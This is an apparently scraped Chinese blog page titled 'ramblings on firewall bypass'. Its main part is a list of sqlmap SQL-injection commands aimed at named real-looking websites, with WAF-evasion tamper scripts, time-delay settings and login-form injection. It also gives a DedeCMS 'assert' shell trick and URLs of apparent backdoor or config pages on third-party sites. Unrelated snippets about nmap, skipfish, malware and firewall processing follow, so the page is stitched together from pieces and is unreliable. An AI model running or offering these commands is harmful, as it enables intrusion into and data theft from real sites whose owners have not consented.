防火墙绕过漫谈

sqlmap.py -u "http://www.thinkpadstore.cn/search.php" --cookie "keywords=WCRTESTINPUT000000" --dbs --level 2

sqlmap.py -u "http://www.etr.com.cn/index.php?m=yp&c=index&a=list_company&catid=5" --tamper xforwardedfor.py --time-sec=20000 --delay=20

织梦模板后缀广告管理 拿shell添加代码“&c=assert”

http://www.sinomep.com/pb-admin/error.php

http://www.sinomep.com/pb-admin/error.php

http://www.pcbtech.net/upimg/userup/99/0703/config.php

请求延迟注入:访问页面两次报错 然后恢复正常

sqlmap.py --dbs -u "url" delay {设置秒数};

sqlmap.py --dbs -u "url"  --safe--freq {设置次数};

cookie注入

sqlmap.py - u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2

post登陆框注入

1、burpsuite抓包  sqlmap.py -r {文本注入}ptfUPass

2、sqlmap.py -u "url" --from {自动判断注入}

3、sqlmap.py -u "url" --data"tFUName=1&tfUPass=1" {指定登陆框参数注入}

绕过waf防火墙注入

sqlmap.py -u "http://www.xjbtedu.cn/bbs/index.asp?lm=825" -v 3 --dbs  --batch --tamper "space2hash.py"

sqlmap.py -u "http://www.jieshun.cn.com/en/show.php?contentid=4368=" —tamper xforwardedfor.py —time-sec=2000 —delay=5

sqlmap.py -u "http://www.cssd.com.cn/show_jtyw.asp?id=343" —tamper xforwardedfor.py —time-sec=2000 —delay=5

延时过狗 : sqlmap.py -u "http://www.chem.com.cn/S_Product.aspx?keyword=%
C2%C8%BB%AF%EF%A7"  -v 3 -tamper "space2comment.py"  -time-sec=5 --batch -p "id"

时间: 2024-10-29 19:10:33

防火墙绕过漫谈的相关文章

nmap使用指南

一.目标指定 1.CIDR标志位 192.168.1.0/24 2.指定范围 192.168.1.1-255 192.168.1-255.1(任意位置)3.IPv6地址只能用规范的IPv6地址或主机名指定. CIDR 和八位字节范围不支持IPv6,因为它们对于IPv6几乎没什么用. -iL <文件名> 主机名或者ip地址列表列表中的项可以是Nmap在 命令行上接受的任何格式(IP地址,主机名,CIDR,IPv6,或者八位字节范围). 每一项必须以一个或多个空格,制表符或换行符分开. 如果您希望

【安全牛学习笔记】Web扫描器(2)

skipfish 功能: 递归爬网 基于字典探测 优点:速度快 多路单线程,全异步网络I/O,消除内存管理和调度开销 启发式自动内容识别 误报较低命令: skipfish-otesthttp://1.1.1.1 -o输出目录[email protected] skipfish-otest-Scomplet.wl-Wa.wl调用字典文件 -I: 检查包含指定字符串的url -X: 不检查包含指定字符串的url -K: 不对指定参数进行测试-D: 跨站爬另外一个域 -l: 每秒最大请求数-m: 每I

现代恶意程序运作浅探及思考

有不少人为"黑客"一词辩护,认为其所指乃是一群"技术狂人"而已,"黑客"分享工具,而脚本小子使用工具干坏事.随着越来越多恶意程序从技术展示转变为明确的Stealing.这让我感觉"黑客"群体并不比世俗社会更纯洁.当越来越多具有较低受教育水平的人加入其中.目的或许只剩下如何快速地赚钱. 速成时代 前段时间一个木马制作者被曝光了出来.他在三年前还在计算机论坛问一些很基础的计算机问题.而今他已经是一名拥有几十万肉鸡的"红人

Nmap备忘单:从探索到漏洞利用(Part3)

众所周知NMAP是经常用来进行端口发现.端口识别.除此之外我们还可以通过NMAP的NSE脚本做很多事情,比如邮件指纹识别,检索WHOIS记录,使用UDP服务等. 发现地理位置 Gorjan Petrovski提交了个NMAP的NSE脚本,帮助我们定位远程IP的地理位置:ip-geolocation-maxmind,ip-geolocation-ipinfodb,和ipgeolocation-geobytes. 这将告诉我们如何设置并使用附带的NMAP NSE的地理位置脚本.  ip-geoloc

华为FW报文处理流程

以下摘抄自<华为防火墙技术漫谈>,有删减 查询会话中的处理过程 协议报文 OSPF.IGMP.HRP等称为协议报文 以OSPF为例,广播环境下,DD是单播,需要安全策略检查:P2P环境中,DD为组播,不需要安全策略检查 业务报文 将穿越防火墙的称为业务报文,比如TCP.UDP承载的数据 这类报文需要创建会话,不能匹配任一会话的就认为是首包 首包处理流程 黑名单匹配(这个不是acl,有专门的黑名单功能) 是否命中正反向server-map表,命中则记录其中的信息 根据第2步结果,查询报文命中哪条

近期计算机类图书强推重磅一览

为给大家繁忙的工作提供便捷,特将近一周左右的计算机类精品书籍做了一个小专题,之后也会不定期的进行各类型的重磅书籍推荐专题或各种的线上线下活动,希望各位能从这里找到符合您需求的内容. 一.<高性能网站建设进阶指南:Web开发者性能优化最佳实践> 本书适合Web架构师.信息架构师.Web开发人员及产品经理阅读和参考. 地址 http://product.china-pub.com/4707062 二.<Cacti实战> 由拥有近10年运维经验的资深Cacti专家撰写,是中国本土最深入的

白帽子-高端信息安全培训

下载地址 :链接:http://pan.baidu.com/s/1wG9pO 密码:4d8k 1.前言和基础串烧 培训课程体系的简介 业界对专业安全从业者的要求定位 网络基础知识以及从事信息安全对网络技能的要求能力 操作系统基础知识以及从事信息安全对网络技能的要求能力 2.操作系统的加固和安全分析 Windows操作系统的安全加固的标准和技巧以及在安全工作中的应用 Linux操作系统的安全加固的标准和技巧以及在安全工作中的应用 基于等级保护测评标准.风险评估规范标准的操作系统加固案例解释 3.渗

小梅科普:白帽子-高端信息安全培训

-----------------------------------------------我是分割线---------------------------------------------------------------- 感兴趣的拉到末尾 1.前言和基础串烧 培训课程体系的简介 业界对专业安全从业者的要求定位 网络基础知识以及从事信息安全对网络技能的要求能力 操作系统基础知识以及从事信息安全对网络技能的要求能力 2.操作系统的加固和安全分析 Windows操作系统的安全加固的标准和技

绕过防火墙的研究

WAF攻防研究之四个层次Bypass WAF 利用 DNS 隧道传递数据和命令来绕过防火墙